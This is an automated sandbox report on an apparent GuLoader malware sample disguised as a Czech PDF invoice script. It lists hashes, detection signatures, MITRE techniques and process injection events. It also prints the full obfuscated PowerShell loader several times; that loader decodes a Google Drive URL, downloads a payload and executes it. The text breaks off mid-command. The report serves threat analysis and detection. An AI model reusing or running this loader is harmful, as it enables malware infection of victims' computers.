guloader | 6754a5938953902145151e2bacfcfd6e55d6f943464fecbc10ce13fd7cc130c5

General

Target

Vyúčtování 18_09_2024 27872904·pdf.vbe
Size

33KB
MD5

3d931d67341a7178eed6018098e82026
SHA1

28738415421b3631245b7f8939ff625bb2d56d7a
SHA256

6754a5938953902145151e2bacfcfd6e55d6f943464fecbc10ce13fd7cc130c5
SHA512

7ba628cd12f11eede084bdc30a29c1d1092b14ba468bcbab319b327e637ffb49d825298402ec4389f8e9032a4741a8ca015132d47a31336e8cb4e56750f9f979
SSDEEP

384:Z9vOg3Z9KsZOs0gN/C2NE3+DEytdZbFo/SwiKFTblveb0fyio/:Zp3Z/N/C2K3v2LfwiKFsk4

Score

10^/10

guloader discovery downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2360	powershell.exe
5	2360	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
2	drive.google.com
3	drive.google.com
8	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2252	wabmig.exe
2252	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2492	powershell.exe
2252	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2492 set thread context of 2252	2492	powershell.exe	37

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2492	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2360	powershell.exe
2492	powershell.exe
2492	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2492	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	2492	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2252	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2676 wrote to memory of 2360	2676	WScript.exe	30
PID 2676 wrote to memory of 2360	2676	WScript.exe	30
PID 2676 wrote to memory of 2360	2676	WScript.exe	30
PID 2360 wrote to memory of 3032	2360	powershell.exe	32
PID 2360 wrote to memory of 3032	2360	powershell.exe	32
PID 2360 wrote to memory of 3032	2360	powershell.exe	32
PID 2360 wrote to memory of 2124	2360	powershell.exe	34
PID 2360 wrote to memory of 2124	2360	powershell.exe	34
PID 2360 wrote to memory of 2124	2360	powershell.exe	34
PID 2124 wrote to memory of 2492	2124	cmd.exe	35
PID 2124 wrote to memory of 2492	2124	cmd.exe	35
PID 2124 wrote to memory of 2492	2124	cmd.exe	35
PID 2124 wrote to memory of 2492	2124	cmd.exe	35
PID 2492 wrote to memory of 1148	2492	powershell.exe	36
PID 2492 wrote to memory of 1148	2492	powershell.exe	36
PID 2492 wrote to memory of 1148	2492	powershell.exe	36
PID 2492 wrote to memory of 1148	2492	powershell.exe	36
PID 2492 wrote to memory of 2252	2492	powershell.exe	37
PID 2492 wrote to memory of 2252	2492	powershell.exe	37
PID 2492 wrote to memory of 2252	2492	powershell.exe	37
PID 2492 wrote to memory of 2252	2492	powershell.exe	37
PID 2492 wrote to memory of 2252	2492	powershell.exe	37
PID 2492 wrote to memory of 2252	2492	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Vyúčtování 18_09_2024 27872904·pdf.vbe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#lammergeier Illustrationsideer sesquialteran Bestyrelsesposter #>;$hemen='Pacificer';<#Mesymnion urgeringens Unmitigative Ivorybill Fremfringshastighed Afreet Araneae #>;$Fluorindine92=$host.PrivateData;If ($Fluorindine92) {$Tvivlsommererritamentet++;}function Sereh($Stopventilernes){$Tvivlsommerebenholtsfljterne=$Stopventilernes.Length-$Tvivlsommererritamentet;for( $Tvivlsommere=5;$Tvivlsommere -lt $Tvivlsommerebenholtsfljterne;$Tvivlsommere+=6){$Nationaliserings+=$Stopventilernes[$Tvivlsommere];}$Nationaliserings;}function unhoard($Bronchium){ . ($Himmelfartsdag) ($Bronchium);}$Operationalization=Sereh 'HydroM W tcoAf.ndz Me.liBlodbl ValflultraaModer/Vint 5 Tilp.Coppi0 Fins Regn(ZooloWBabuaivansinAnfordAldehoBalt.wPdagosTotur NonaNEnkelTIbrnd Voetg1 Redn0 Unha.U sub0 .iaa;raasi CommoW premi AmtsnIngeb6F lse4Oatme;Samle Fa gsxUved.6Snoda4 Biet;Lavri Bilamr TwitvThrou:Smreo1 Hest2 tem1Overc.Gleet0Bitni)Bogs twinsG Da,ieOptagcDeplokAroynoNonde/I ida2 Mili0Boile1 Sho,0Myoto0,verw1 Octa0Skriv1Rheum SlacFKnstkiHjlperByggee HexifSatsao BegyxLeg,t/Compa1 .ena2Damph1 Admo.I dsk0Enzym ';$Concaptive=Sereh 'RyggeuCoproSEfterestipuRKe ta- baanA Hy,oGHemm EPanteNpampeTPe ep ';$Otelcosis=Sereh 'Over hFllestC upatPattepBhagas ykew:Ceci / Vidn/UopstdUdsvirB idgiwaz.rv Al re alou.S.eelgPinaco Wh,roSolubg Cirkl ResieQuest.SubjacCharkoSinusm Slle/SydliuD lbacVinte?EnsreeCo.ntx SkpppHjkuloSkejsrMonittCo.dy= JudidPomewo Rs iwKropenForunlReimpoOutsta ,rbed ,orb&kvik,iD ktad ypog=Gyld 1AfgraYLuftibNeedeJ UnerKFl nt5MaanegHo esHCo orsStudizPaginNBukniXRec nP SkilMPanam8Olieb2AutopvBacteEHove rs.aphVJelsea D reZ remeyDilet- T whWA sti6 CeilRComatV,enostTa,lwFHag,iTHes.erBlackM Ophi ';$Elementhusene=Sereh 'Amoti>Feuda ';$Himmelfartsdag=Sereh 'nonreiPar.lEPolyox.ncho ';$Nonsenet='varelagre';$Nullernes = Sereh 'Arbe.eSchiscBjrgshGu rioB ugt Phren%Barn aNondapPostapRhei dV,lidaTa tat,nvigaSpart% M.xo\MalabF,eaneiUnflanFibriaNyfi.n Su.ecMagniiUndereOndskrSandveG.mmad onvi. Gig a Ano dConspvTesta Lavtg&Afska& P ag Ud.age A gocLyk ehResuro.egro ivertr spr ';unhoard (Sereh 'Glute$BandegJi.gllAfbrno KonfbP.npaaseptilTj ne:UnderMPliero Henrrro dybtilstiFloorlmedi,lLucitoAkkomumili s onta= Incr(IncorcSl.tnmFightddomsm Rooml/vuersc.fsmi Acc p$fusioN AfpluRodeolKrs.llProcyeArealrho.ednBra.keCo pusAkele)inter ');unhoard (Sereh 'Specu$Synkrgreprol CenooBen obSelinaTupi l hete:Solb P MonaoTrskenVandid Pande TirerInforaIndfatHemagi PresoIndrmn Prec=frems$InterOtriantPropre PicklCa,lic,kkorode.pesK.utzieclecsconco.UtumrsKvivapKund lBeklii,lykktSkriv(Spond$arbejE ,trilI laye S,elmBonnieHemm n SpeltCristhC einu UnglsOverbeMonomn A lee traa)Parad ');unhoard (Sereh 'Fores[BalanNSkilleHet rtFalsk.PeriaS cus efe rirA,strvBe.agiVoidscErhveeImperPOcty oLe idiOmrr.nDrabbtMonocMReskoashaggn ftraPourag.tasseslvbrrSogdi]Eryth:Cr,pt:S nknSP aeoe Fl bcCosciuRenterArchoiSel ut CoeryCreosP Es,rr HemooTabultkor,noMorphcbull oto.relLilan Fedte=Ko,me Flles[MaledN ologeaetertVolum.Unc rSO opheAbomic Eksau IngerVaskei Cyr t SkinyOverdPFurlarBroanoB neftOrdbooS rupcOckfloAdvoklTurneTEvoley MennpNybygeDist ] heva:artol:LnsatTvati,lenkensBakke1 Belk2en ri ');$Otelcosis=$Ponderation[0];$Anvendelsesorienteret112= (Sereh ' rabe$ .rang Str.LMa egOPratiBGasteA MakklBonas:Haan,sSygeeT quidiOr.erLSmalrlBenv.E Overd U oreCaim =Rickln ,enzENdpl WGrafb-FortroLivsnBSky sJBesvrEsm.okcSwoonTBando u meaSTrst,y Matus olytGa maEErg mMFlsk,.Damm NAngule lonetExp.d.Fa ciwPrevee UndibBetnkcD mkaLSkattiUnrepEsubfunNonstT');$Anvendelsesorienteret112+=$Morbillous[1];unhoard ($Anvendelsesorienteret112);unhoard (Sereh ' .pid$AwakaSVddeltStep i T,rmlForbalSnowsePrededscr.eeAfslr.GroggHUptrueBarbraFat yd Hynees,fisr Porrs kspo[Cirku$TelesCKloveoDrontnHam dcUnrowatils pBlod.t Gau i trakvSeni eVagne]Alkal=Tota $ PapiOLen mpagaleeIrritrhemaraK ntatCar siDo,beoTnkemnBidraaHematl KogeiHydrozNishiaBedsttAmphiiSamp oSectinTubat ');$Dekoreredes=Sereh 'Pl gu$ ChapSReasstOver,iArchal oroglFleureunreadOpfriepisc .fotomDTiendoUnc lw enetn.orstlbutyloTi,baaOverld NedeFMai gi G.nil GrdieRedni(U.age$ DepoOAdlydtDislie levilMaanecYor.ro,ngios M.thiHephts Fo s,Gr nd$FanouRS,illi GennmZygmuiH,mene MiljrNekro1 Manu3Konte1Draen) ord ';$Rimier131=$Morbillous[0];unhoard (Sereh 'gsten$PersoG elicl Bl mODerivbFortyAFarmel fy i:ObstrSVildttAbol UFalsud SnvrIYard eBrevoPVidunlBeh,nAMegald delsBlokdEDolibRW altnNon ee Gours Anke= Noct(Enes tAdenoeJordesTrykstCu,pa- ointpPhycia utistCosmohForp Suffr$Ethnor CrepIRenowM Mi iiStrateP,lemr Nu m1Older3Phant1Visit)Hexam ');while (!$Studiepladsernes) {unhoard (Sereh 'Total$diskrg VrdilWh.ngoOverfbOrnita progl.verd:Sai aAOrgansI,eith Eidepfu,zelDigenaDelinnAfha tKabinsSt,ic=Tarnk$PalomtKup erAnp rusp,lleBlenn ') ;unhoard $Dekoreredes;unhoard (Sereh 'sparrSF nantAffolaInsolrGe.gatBrans- Si kSNonu.l BetseCorneeBeaujpvilia Senso4Rense ');unhoard (Sereh 'Stn p$Afr ggUbarblS ernoFaresbParafaHder,lInfek:AmmonS.fstetBaviaunomindWa deiNonfleHureapKurvelWei eaRetfrdE ingsIoni e Ko.trBioscnWeitseNab.ls.rkra=Nedfl(HylerT SleteCad tsBestitSprea-Ko,lePTalkiaFredstP rtuhfolke rus y$Con.iR,reoriPorsemSldefiHul,oetrogorTraum1 Skib3Trans1 I dr) Ly.t ') ;unhoard (Sereh 'Polyc$ Lykng Bodil,ctogo pecbSlowuadambrlGeogr:Yipv MSuccebP veblBant eSuppur Bestn BlideToste=Magni$Fors gVirkslBlecioLe,tybHyleraSk,ttlUdmrk:Sank BNon iaJonissL gosiKvs.enAnnuia PigesA ouriEnzyma P,onl Re u+kart + Surf%Folk,$AnikiPSpandoundisnSa ted SubceEpi.ori.veraIndpatDyspeiS ackoLe.finNonpo.Immanc I.mbo naruBenzynSwindtStemn ') ;$Otelcosis=$Ponderation[$Mblerne];}$Urskovsmrket=335640;$Tvivlsommerendri=27847;unhoard (Sereh 'Calci$IndaagD ssulThoraoKlaribTrs ia Metelfo db:OleacNtvinee Eurot bransAfsyrt Perpi,uppukDisrek bogreToyintCyklu Epos.=By,on Ud,kGafs nesyrphtKon.e-ChampCKommuoSkot nUnph t Pam eSeksun Lap.tOra g C li$Car aRFor wiFdselmHerniizarnieUnderrSyncr1Forsk3 Siza1Troi ');unhoard (Sereh 'Dec,m$Bobesg Eftel sagloKonsub,heotaSamf lEctom:bamseP B ckaCitolaMis ek,nvesrS rubeDishwn Wa ddBrak e Giri Logbo=Pre r Betrk[UnseaSkamplyolioss VefrtDiskeeHomeomApr.t.AscenC GangoFor lnUnporvRobeneDeplor So,ttUk,nt]Alkyl:A tho:FarveFSpinur Deplolunefm lysB T rba Snk sUnderepindl6Telef4Jims S anmatSnerprstatsi Domen,asarg typ,(Emb r$Skr uNn nebeSmrbotPh tosN.npetSuperiHeadfkTenorkGrunde.tatit Erhv) Raff ');unhoard (Sereh 'Yvonn$bardeghermelNonpao PegsbModsta B,skloppeb:GeigePPoloioGui ar .nobsGal o Ca t=Komme Impeo[DeadeSFigury nversOm,attLandfe kolkm K.nt.ArbejTMalapeTrianxBoreptOkeru.Pous EOverlnhlde cVelu.oForspd Ulc iNidd nM,strgHarpa]V,lut: f ik:m,lliA R.suSPhyciCknusmIDri tINiche.SladdG etmleGangwtInappS irkt H rrr R ntiForlanByporgRets (Ch on$AnthePSmagnaTrigla.revlkunquerkongeeshad nSoe,ed Col eSyste) Srkl ');unhoard (Sereh 'Fjern$ N,trg bratl Om toOverfbUndf a PhytlMelod:UdrmmKOver,iMu ams apitrTidssaFemto1Urano4 inti=No me$DeminP Trskognaverknbuks U de.MelansLo.ryuS ckebIdomesSt mmtNedsnr BramiAttringen.tgauthe(Gra s$,apabU SlavrS,ampsOptr.k K.ntoSkeldv Erods K ebm KlunrpaaklkStnineFranat Vrdi, vic$ChronTReklavMisdoiAntsivSubtrlSkylds ParaodelagmC lotmUnderekry drPersoeCr menVo.dsdRe,nnr forsiSp.og) Sprr ');unhoard $Kisra14;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2360
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Financiered.adv && echo t"
    3⤵
    PID:3032
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#lammergeier Illustrationsideer sesquialteran Bestyrelsesposter #>;$hemen='Pacificer';<#Mesymnion urgeringens Unmitigative Ivorybill Fremfringshastighed Afreet Araneae #>;$Fluorindine92=$host.PrivateData;If ($Fluorindine92) {$Tvivlsommererritamentet++;}function Sereh($Stopventilernes){$Tvivlsommerebenholtsfljterne=$Stopventilernes.Length-$Tvivlsommererritamentet;for( $Tvivlsommere=5;$Tvivlsommere -lt $Tvivlsommerebenholtsfljterne;$Tvivlsommere+=6){$Nationaliserings+=$Stopventilernes[$Tvivlsommere];}$Nationaliserings;}function unhoard($Bronchium){ . ($Himmelfartsdag) ($Bronchium);}$Operationalization=Sereh 'HydroM W tcoAf.ndz Me.liBlodbl ValflultraaModer/Vint 5 Tilp.Coppi0 Fins Regn(ZooloWBabuaivansinAnfordAldehoBalt.wPdagosTotur NonaNEnkelTIbrnd Voetg1 Redn0 Unha.U sub0 .iaa;raasi CommoW premi AmtsnIngeb6F lse4Oatme;Samle Fa gsxUved.6Snoda4 Biet;Lavri Bilamr TwitvThrou:Smreo1 Hest2 tem1Overc.Gleet0Bitni)Bogs twinsG Da,ieOptagcDeplokAroynoNonde/I ida2 Mili0Boile1 Sho,0Myoto0,verw1 Octa0Skriv1Rheum SlacFKnstkiHjlperByggee HexifSatsao BegyxLeg,t/Compa1 .ena2Damph1 Admo.I dsk0Enzym ';$Concaptive=Sereh 'RyggeuCoproSEfterestipuRKe ta- baanA Hy,oGHemm EPanteNpampeTPe ep ';$Otelcosis=Sereh 'Over hFllestC upatPattepBhagas ykew:Ceci / Vidn/UopstdUdsvirB idgiwaz.rv Al re alou.S.eelgPinaco Wh,roSolubg Cirkl ResieQuest.SubjacCharkoSinusm Slle/SydliuD lbacVinte?EnsreeCo.ntx SkpppHjkuloSkejsrMonittCo.dy= JudidPomewo Rs iwKropenForunlReimpoOutsta ,rbed ,orb&kvik,iD ktad ypog=Gyld 1AfgraYLuftibNeedeJ UnerKFl nt5MaanegHo esHCo orsStudizPaginNBukniXRec nP SkilMPanam8Olieb2AutopvBacteEHove rs.aphVJelsea D reZ remeyDilet- T whWA sti6 CeilRComatV,enostTa,lwFHag,iTHes.erBlackM Ophi ';$Elementhusene=Sereh 'Amoti>Feuda ';$Himmelfartsdag=Sereh 'nonreiPar.lEPolyox.ncho ';$Nonsenet='varelagre';$Nullernes = Sereh 'Arbe.eSchiscBjrgshGu rioB ugt Phren%Barn aNondapPostapRhei dV,lidaTa tat,nvigaSpart% M.xo\MalabF,eaneiUnflanFibriaNyfi.n Su.ecMagniiUndereOndskrSandveG.mmad onvi. Gig a Ano dConspvTesta Lavtg&Afska& P ag Ud.age A gocLyk ehResuro.egro ivertr spr ';unhoard (Sereh 'Glute$BandegJi.gllAfbrno KonfbP.npaaseptilTj ne:UnderMPliero Henrrro dybtilstiFloorlmedi,lLucitoAkkomumili s onta= Incr(IncorcSl.tnmFightddomsm Rooml/vuersc.fsmi Acc p$fusioN AfpluRodeolKrs.llProcyeArealrho.ednBra.keCo pusAkele)inter ');unhoard (Sereh 'Specu$Synkrgreprol CenooBen obSelinaTupi l hete:Solb P MonaoTrskenVandid Pande TirerInforaIndfatHemagi PresoIndrmn Prec=frems$InterOtriantPropre PicklCa,lic,kkorode.pesK.utzieclecsconco.UtumrsKvivapKund lBeklii,lykktSkriv(Spond$arbejE ,trilI laye S,elmBonnieHemm n SpeltCristhC einu UnglsOverbeMonomn A lee traa)Parad ');unhoard (Sereh 'Fores[BalanNSkilleHet rtFalsk.PeriaS cus efe rirA,strvBe.agiVoidscErhveeImperPOcty oLe idiOmrr.nDrabbtMonocMReskoashaggn ftraPourag.tasseslvbrrSogdi]Eryth:Cr,pt:S nknSP aeoe Fl bcCosciuRenterArchoiSel ut CoeryCreosP Es,rr HemooTabultkor,noMorphcbull oto.relLilan Fedte=Ko,me Flles[MaledN ologeaetertVolum.Unc rSO opheAbomic Eksau IngerVaskei Cyr t SkinyOverdPFurlarBroanoB neftOrdbooS rupcOckfloAdvoklTurneTEvoley MennpNybygeDist ] heva:artol:LnsatTvati,lenkensBakke1 Belk2en ri ');$Otelcosis=$Ponderation[0];$Anvendelsesorienteret112= (Sereh ' rabe$ .rang Str.LMa egOPratiBGasteA MakklBonas:Haan,sSygeeT quidiOr.erLSmalrlBenv.E Overd U oreCaim =Rickln ,enzENdpl WGrafb-FortroLivsnBSky sJBesvrEsm.okcSwoonTBando u meaSTrst,y Matus olytGa maEErg mMFlsk,.Damm NAngule lonetExp.d.Fa ciwPrevee UndibBetnkcD mkaLSkattiUnrepEsubfunNonstT');$Anvendelsesorienteret112+=$Morbillous[1];unhoard ($Anvendelsesorienteret112);unhoard (Sereh ' .pid$AwakaSVddeltStep i T,rmlForbalSnowsePrededscr.eeAfslr.GroggHUptrueBarbraFat yd Hynees,fisr Porrs kspo[Cirku$TelesCKloveoDrontnHam dcUnrowatils pBlod.t Gau i trakvSeni eVagne]Alkal=Tota $ PapiOLen mpagaleeIrritrhemaraK ntatCar siDo,beoTnkemnBidraaHematl KogeiHydrozNishiaBedsttAmphiiSamp oSectinTubat ');$Dekoreredes=Sereh 'Pl gu$ ChapSReasstOver,iArchal oroglFleureunreadOpfriepisc .fotomDTiendoUnc lw enetn.orstlbutyloTi,baaOverld NedeFMai gi G.nil GrdieRedni(U.age$ DepoOAdlydtDislie levilMaanecYor.ro,ngios M.thiHephts Fo s,Gr nd$FanouRS,illi GennmZygmuiH,mene MiljrNekro1 Manu3Konte1Draen) ord ';$Rimier131=$Morbillous[0];unhoard (Sereh 'gsten$PersoG elicl Bl mODerivbFortyAFarmel fy i:ObstrSVildttAbol UFalsud SnvrIYard eBrevoPVidunlBeh,nAMegald delsBlokdEDolibRW altnNon ee Gours Anke= Noct(Enes tAdenoeJordesTrykstCu,pa- ointpPhycia utistCosmohForp Suffr$Ethnor CrepIRenowM Mi iiStrateP,lemr Nu m1Older3Phant1Visit)Hexam ');while (!$Studiepladsernes) {unhoard (Sereh 'Total$diskrg VrdilWh.ngoOverfbOrnita progl.verd:Sai aAOrgansI,eith Eidepfu,zelDigenaDelinnAfha tKabinsSt,ic=Tarnk$PalomtKup erAnp rusp,lleBlenn ') ;unhoard $Dekoreredes;unhoard (Sereh 'sparrSF nantAffolaInsolrGe.gatBrans- Si kSNonu.l BetseCorneeBeaujpvilia Senso4Rense ');unhoard (Sereh 'Stn p$Afr ggUbarblS ernoFaresbParafaHder,lInfek:AmmonS.fstetBaviaunomindWa deiNonfleHureapKurvelWei eaRetfrdE ingsIoni e Ko.trBioscnWeitseNab.ls.rkra=Nedfl(HylerT SleteCad tsBestitSprea-Ko,lePTalkiaFredstP rtuhfolke rus y$Con.iR,reoriPorsemSldefiHul,oetrogorTraum1 Skib3Trans1 I dr) Ly.t ') ;unhoard (Sereh 'Polyc$ Lykng Bodil,ctogo pecbSlowuadambrlGeogr:Yipv MSuccebP veblBant eSuppur Bestn BlideToste=Magni$Fors gVirkslBlecioLe,tybHyleraSk,ttlUdmrk:Sank BNon iaJonissL gosiKvs.enAnnuia PigesA ouriEnzyma P,onl Re u+kart + Surf%Folk,$AnikiPSpandoundisnSa ted SubceEpi.ori.veraIndpatDyspeiS ackoLe.finNonpo.Immanc I.mbo naruBenzynSwindtStemn ') ;$Otelcosis=$Ponderation[$Mblerne];}$Urskovsmrket=335640;$Tvivlsommerendri=27847;unhoard (Sereh 'Calci$IndaagD ssulThoraoKlaribTrs ia Metelfo db:OleacNtvinee Eurot bransAfsyrt Perpi,uppukDisrek bogreToyintCyklu Epos.=By,on Ud,kGafs nesyrphtKon.e-ChampCKommuoSkot nUnph t Pam eSeksun Lap.tOra g C li$Car aRFor wiFdselmHerniizarnieUnderrSyncr1Forsk3 Siza1Troi ');unhoard (Sereh 'Dec,m$Bobesg Eftel sagloKonsub,heotaSamf lEctom:bamseP B ckaCitolaMis ek,nvesrS rubeDishwn Wa ddBrak e Giri Logbo=Pre r Betrk[UnseaSkamplyolioss VefrtDiskeeHomeomApr.t.AscenC GangoFor lnUnporvRobeneDeplor So,ttUk,nt]Alkyl:A tho:FarveFSpinur Deplolunefm lysB T rba Snk sUnderepindl6Telef4Jims S anmatSnerprstatsi Domen,asarg typ,(Emb r$Skr uNn nebeSmrbotPh tosN.npetSuperiHeadfkTenorkGrunde.tatit Erhv) Raff ');unhoard (Sereh 'Yvonn$bardeghermelNonpao PegsbModsta B,skloppeb:GeigePPoloioGui ar .nobsGal o Ca t=Komme Impeo[DeadeSFigury nversOm,attLandfe kolkm K.nt.ArbejTMalapeTrianxBoreptOkeru.Pous EOverlnhlde cVelu.oForspd Ulc iNidd nM,strgHarpa]V,lut: f ik:m,lliA R.suSPhyciCknusmIDri tINiche.SladdG etmleGangwtInappS irkt H rrr R ntiForlanByporgRets (Ch on$AnthePSmagnaTrigla.revlkunquerkongeeshad nSoe,ed Col eSyste) Srkl ');unhoard (Sereh 'Fjern$ N,trg bratl Om toOverfbUndf a PhytlMelod:UdrmmKOver,iMu ams apitrTidssaFemto1Urano4 inti=No me$DeminP Trskognaverknbuks U de.MelansLo.ryuS ckebIdomesSt mmtNedsnr BramiAttringen.tgauthe(Gra s$,apabU SlavrS,ampsOptr.k K.ntoSkeldv Erods K ebm KlunrpaaklkStnineFranat Vrdi, vic$ChronTReklavMisdoiAntsivSubtrlSkylds ParaodelagmC lotmUnderekry drPersoeCr menVo.dsdRe,nnr forsiSp.og) Sprr ');unhoard $Kisra14;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2124
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#lammergeier Illustrationsideer sesquialteran Bestyrelsesposter #>;$hemen='Pacificer';<#Mesymnion urgeringens Unmitigative Ivorybill Fremfringshastighed Afreet Araneae #>;$Fluorindine92=$host.PrivateData;If ($Fluorindine92) {$Tvivlsommererritamentet++;}function Sereh($Stopventilernes){$Tvivlsommerebenholtsfljterne=$Stopventilernes.Length-$Tvivlsommererritamentet;for( $Tvivlsommere=5;$Tvivlsommere -lt $Tvivlsommerebenholtsfljterne;$Tvivlsommere+=6){$Nationaliserings+=$Stopventilernes[$Tvivlsommere];}$Nationaliserings;}function unhoard($Bronchium){ . ($Himmelfartsdag) ($Bronchium);}$Operationalization=Sereh 'HydroM W tcoAf.ndz Me.liBlodbl ValflultraaModer/Vint 5 Tilp.Coppi0 Fins Regn(ZooloWBabuaivansinAnfordAldehoBalt.wPdagosTotur NonaNEnkelTIbrnd Voetg1 Redn0 Unha.U sub0 .iaa;raasi CommoW premi AmtsnIngeb6F lse4Oatme;Samle Fa gsxUved.6Snoda4 Biet;Lavri Bilamr TwitvThrou:Smreo1 Hest2 tem1Overc.Gleet0Bitni)Bogs twinsG Da,ieOptagcDeplokAroynoNonde/I ida2 Mili0Boile1 Sho,0Myoto0,verw1 Octa0Skriv1Rheum SlacFKnstkiHjlperByggee HexifSatsao BegyxLeg,t/Compa1 .ena2Damph1 Admo.I dsk0Enzym ';$Concaptive=Sereh 'RyggeuCoproSEfterestipuRKe ta- baanA Hy,oGHemm EPanteNpampeTPe ep ';$Otelcosis=Sereh 'Over hFllestC upatPattepBhagas ykew:Ceci / Vidn/UopstdUdsvirB idgiwaz.rv Al re alou.S.eelgPinaco Wh,roSolubg Cirkl ResieQuest.SubjacCharkoSinusm Slle/SydliuD lbacVinte?EnsreeCo.ntx SkpppHjkuloSkejsrMonittCo.dy= JudidPomewo Rs iwKropenForunlReimpoOutsta ,rbed ,orb&kvik,iD ktad ypog=Gyld 1AfgraYLuftibNeedeJ UnerKFl nt5MaanegHo esHCo orsStudizPaginNBukniXRec nP SkilMPanam8Olieb2AutopvBacteEHove rs.aphVJelsea D reZ remeyDilet- T whWA sti6 CeilRComatV,enostTa,lwFHag,iTHes.erBlackM Ophi ';$Elementhusene=Sereh 'Amoti>Feuda ';$Himmelfartsdag=Sereh 'nonreiPar.lEPolyox.ncho ';$Nonsenet='varelagre';$Nullernes = Sereh 'Arbe.eSchiscBjrgshGu rioB ugt Phren%Barn aNondapPostapRhei dV,lidaTa tat,nvigaSpart% M.xo\MalabF,eaneiUnflanFibriaNyfi.n Su.ecMagniiUndereOndskrSandveG.mmad onvi. Gig a Ano dConspvTesta Lavtg&Afska& P ag Ud.age A gocLyk ehResuro.egro ivertr spr ';unhoard (Sereh 'Glute$BandegJi.gllAfbrno KonfbP.npaaseptilTj ne:UnderMPliero Henrrro dybtilstiFloorlmedi,lLucitoAkkomumili s onta= Incr(IncorcSl.tnmFightddomsm Rooml/vuersc.fsmi Acc p$fusioN AfpluRodeolKrs.llProcyeArealrho.ednBra.keCo pusAkele)inter ');unhoard (Sereh 'Specu$Synkrgreprol CenooBen obSelinaTupi l hete:Solb P MonaoTrskenVandid Pande TirerInforaIndfatHemagi PresoIndrmn Prec=frems$InterOtriantPropre PicklCa,lic,kkorode.pesK.utzieclecsconco.UtumrsKvivapKund lBeklii,lykktSkriv(Spond$arbejE ,trilI laye S,elmBonnieHemm n SpeltCristhC einu UnglsOverbeMonomn A lee traa)Parad ');unhoard (Sereh 'Fores[BalanNSkilleHet rtFalsk.PeriaS cus efe rirA,strvBe.agiVoidscErhveeImperPOcty oLe idiOmrr.nDrabbtMonocMReskoashaggn ftraPourag.tasseslvbrrSogdi]Eryth:Cr,pt:S nknSP aeoe Fl bcCosciuRenterArchoiSel ut CoeryCreosP Es,rr HemooTabultkor,noMorphcbull oto.relLilan Fedte=Ko,me Flles[MaledN ologeaetertVolum.Unc rSO opheAbomic Eksau IngerVaskei Cyr t SkinyOverdPFurlarBroanoB neftOrdbooS rupcOckfloAdvoklTurneTEvoley MennpNybygeDist ] heva:artol:LnsatTvati,lenkensBakke1 Belk2en ri ');$Otelcosis=$Ponderation[0];$Anvendelsesorienteret112= (Sereh ' rabe$ .rang Str.LMa egOPratiBGasteA MakklBonas:Haan,sSygeeT quidiOr.erLSmalrlBenv.E Overd U oreCaim =Rickln ,enzENdpl WGrafb-FortroLivsnBSky sJBesvrEsm.okcSwoonTBando u meaSTrst,y Matus olytGa maEErg mMFlsk,.Damm NAngule lonetExp.d.Fa ciwPrevee UndibBetnkcD mkaLSkattiUnrepEsubfunNonstT');$Anvendelsesorienteret112+=$Morbillous[1];unhoard ($Anvendelsesorienteret112);unhoard (Sereh ' .pid$AwakaSVddeltStep i T,rmlForbalSnowsePrededscr.eeAfslr.GroggHUptrueBarbraFat yd Hynees,fisr Porrs kspo[Cirku$TelesCKloveoDrontnHam dcUnrowatils pBlod.t Gau i trakvSeni eVagne]Alkal=Tota $ PapiOLen mpagaleeIrritrhemaraK ntatCar siDo,beoTnkemnBidraaHematl KogeiHydrozNishiaBedsttAmphiiSamp oSectinTubat ');$Dekoreredes=Sereh 'Pl gu$ ChapSReasstOver,iArchal oroglFleureunreadOpfriepisc .fotomDTiendoUnc lw enetn.orstlbutyloTi,baaOverld NedeFMai gi G.nil GrdieRedni(U.age$ DepoOAdlydtDislie levilMaanecYor.ro,ngios M.thiHephts Fo s,Gr nd$FanouRS,illi GennmZygmuiH,mene MiljrNekro1 Manu3Konte1Draen) ord ';$Rimier131=$Morbillous[0];unhoard (Sereh 'gsten$PersoG elicl Bl mODerivbFortyAFarmel fy i:ObstrSVildttAbol UFalsud SnvrIYard eBrevoPVidunlBeh,nAMegald delsBlokdEDolibRW altnNon ee Gours Anke= Noct(Enes 